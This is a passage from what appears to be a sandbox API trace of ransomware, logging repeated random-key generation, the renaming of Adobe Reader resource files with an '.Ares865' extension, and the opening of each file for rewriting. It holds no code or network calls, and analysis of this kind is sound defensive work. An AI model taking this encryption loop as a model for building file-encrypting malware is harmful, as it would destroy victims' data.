CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.593] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0157.594] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0157.594] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.594] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="grm.hyp" | out: lpString1="grm.hyp") returned="grm.hyp" [0157.594] lstrlenW (lpString="grm.hyp") returned 7 [0157.594] lstrlenW (lpString="Ares865") returned 7 [0157.595] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm.hyp.Ares865") returned 103 [0157.595] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\grm.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\grm.hyp.ares865"), dwFlags=0x1) returned 1 [0157.597] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\grm.hyp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0157.597] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=46080) returned 1 [0157.597] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0157.598] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0157.598] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.602] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0157.603] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0157.603] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.604] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="grm104.hsp" | out: lpString1="grm104.hsp") returned="grm104.hsp" [0157.604] lstrlenW (lpString="grm104.hsp") returned 10 [0157.604] lstrlenW (lpString="Ares865") returned 7 [0157.604] lstrcmpiW (lpString1="104.hsp", lpString2="Ares865") returned -1 [0157.605] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm104.hsp.Ares865") returned 106 [0157.605] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm104.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\grm104.hsp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm104.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\grm104.hsp.ares865"), dwFlags=0x1) returned 1 [0157.607] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm104.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\grm104.hsp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0157.607] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=625399) returned 1 [0157.608] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0157.608] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0157.608] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.637] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0157.638] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0157.638] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.646] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="grm32.clx" | out: lpString1="grm32.clx") returned="grm32.clx" [0157.646] lstrlenW (lpString="grm32.clx") returned 9 [0157.646] lstrlenW (lpString="Ares865") returned 7 [0157.647] lstrcmpiW (lpString1="m32.clx", lpString2="Ares865") returned 1 [0157.647] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm32.clx.Ares865") returned 105 [0157.647] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\grm32.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\grm32.clx.ares865"), dwFlags=0x1) returned 1 [0157.650] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\grm32.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0157.650] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32768) returned 1 [0157.651] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0157.651] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0157.651] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.656] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0157.656] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0157.656] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.657] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="grm92.ths" | out: lpString1="grm92.ths") returned="grm92.ths" [0157.657] lstrlenW (lpString="grm92.ths") returned 9 [0157.657] lstrlenW (lpString="Ares865") returned 7 [0157.658] lstrcmpiW (lpString1="m92.ths", lpString2="Ares865") returned 1 [0157.658] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm92.ths.Ares865") returned 105 [0157.658] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm92.ths" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\grm92.ths"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm92.ths.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\grm92.ths.ares865"), dwFlags=0x1) returned 1 [0157.660] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm92.ths.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\grm92.ths.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0157.660] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=789504) returned 1 [0157.661] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0157.661] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0157.661] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.706] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0157.707] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0157.707] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.717] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="heb.fca" | out: lpString1="heb.fca") returned="heb.fca" [0157.717] lstrlenW (lpString="heb.fca") returned 7 [0157.717] lstrlenW (lpString="Ares865") returned 7 [0157.718] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\heb.fca.Ares865") returned 103 [0157.718] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\heb.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\heb.fca"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\heb.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\heb.fca.ares865"), dwFlags=0x1) returned 1 [0157.722] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\heb.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\heb.fca.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0157.722] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=624) returned 1 [0157.722] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0157.723] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0157.723] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.725] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0157.726] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0157.726] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.726] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="heb.hyp" | out: lpString1="heb.hyp") returned="heb.hyp" [0157.726] lstrlenW (lpString="heb.hyp") returned 7 [0157.726] lstrlenW (lpString="Ares865") returned 7 [0157.727] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\heb.hyp.Ares865") returned 103 [0157.727] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\heb.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\heb.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\heb.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\heb.hyp.ares865"), dwFlags=0x1) returned 1 [0157.729] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\heb.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\heb.hyp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0157.729] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10240) returned 1 [0157.729] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0157.730] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0157.730] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.733] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0157.733] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0157.733] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.734] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="heb134.hsp" | out: lpString1="heb134.hsp") returned="heb134.hsp" [0157.734] lstrlenW (lpString="heb134.hsp") returned 10 [0157.734] lstrlenW (lpString="Ares865") returned 7 [0157.734] lstrcmpiW (lpString1="134.hsp", lpString2="Ares865") returned -1 [0157.735] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\heb134.hsp.Ares865") returned 106 [0157.735] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\heb134.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\heb134.hsp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\heb134.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\heb134.hsp.ares865"), dwFlags=0x1) returned 1 [0157.736] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\heb134.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\heb134.hsp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0157.737] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=739294) returned 1 [0157.737] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0157.738] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0157.738] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.773] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0157.774] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0157.774] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.784] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="heb32.clx" | out: lpString1="heb32.clx") returned="heb32.clx" [0157.784] lstrlenW (lpString="heb32.clx") returned 9 [0157.784] lstrlenW (lpString="Ares865") returned 7 [0157.784] lstrcmpiW (lpString1="b32.clx", lpString2="Ares865") returned 1 [0157.784] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\heb32.clx.Ares865") returned 105 [0157.784] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\heb32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\heb32.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\heb32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\heb32.clx.ares865"), dwFlags=0x1) returned 1 [0157.788] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\heb32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\heb32.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0157.788] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32767) returned 1 [0157.788] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0157.789] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0157.789] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.793] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0157.793] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0157.793] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.794] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="hrv.hyp" | out: lpString1="hrv.hyp") returned="hrv.hyp" [0157.794] lstrlenW (lpString="hrv.hyp") returned 7 [0157.794] lstrlenW (lpString="Ares865") returned 7 [0157.795] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hrv.hyp.Ares865") returned 103 [0157.795] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hrv.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hrv.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hrv.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hrv.hyp.ares865"), dwFlags=0x1) returned 1 [0157.797] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hrv.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hrv.hyp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0157.797] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10240) returned 1 [0157.797] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0157.798] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0157.798] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.803] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0157.803] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0157.803] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.804] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="hrv132.lex" | out: lpString1="hrv132.lex") returned="hrv132.lex" [0157.804] lstrlenW (lpString="hrv132.lex") returned 10 [0157.804] lstrlenW (lpString="Ares865") returned 7 [0157.804] lstrcmpiW (lpString1="132.lex", lpString2="Ares865") returned -1 [0157.805] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hrv132.lex.Ares865") returned 106 [0157.805] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hrv132.lex" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hrv132.lex"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hrv132.lex.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hrv132.lex.ares865"), dwFlags=0x1) returned 1 [0157.807] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hrv132.lex.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hrv132.lex.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0157.807] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=618496) returned 1 [0157.807] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0157.808] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0157.808] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.835] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0157.836] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0157.836] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.844] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="hrv32.clx" | out: lpString1="hrv32.clx") returned="hrv32.clx" [0157.844] lstrlenW (lpString="hrv32.clx") returned 9 [0157.844] lstrlenW (lpString="Ares865") returned 7 [0157.844] lstrcmpiW (lpString1="v32.clx", lpString2="Ares865") returned 1 [0157.845] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hrv32.clx.Ares865") returned 105 [0157.845] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hrv32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hrv32.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hrv32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hrv32.clx.ares865"), dwFlags=0x1) returned 1 [0157.847] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hrv32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hrv32.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0157.848] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32766) returned 1 [0157.848] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0157.848] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0157.849] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.853] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0157.854] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0157.854] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0157.855] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="hrvphon.env.Ares865" | out: lpString1="hrvphon.env.Ares865") returned="hrvphon.env.Ares865" [0157.855] 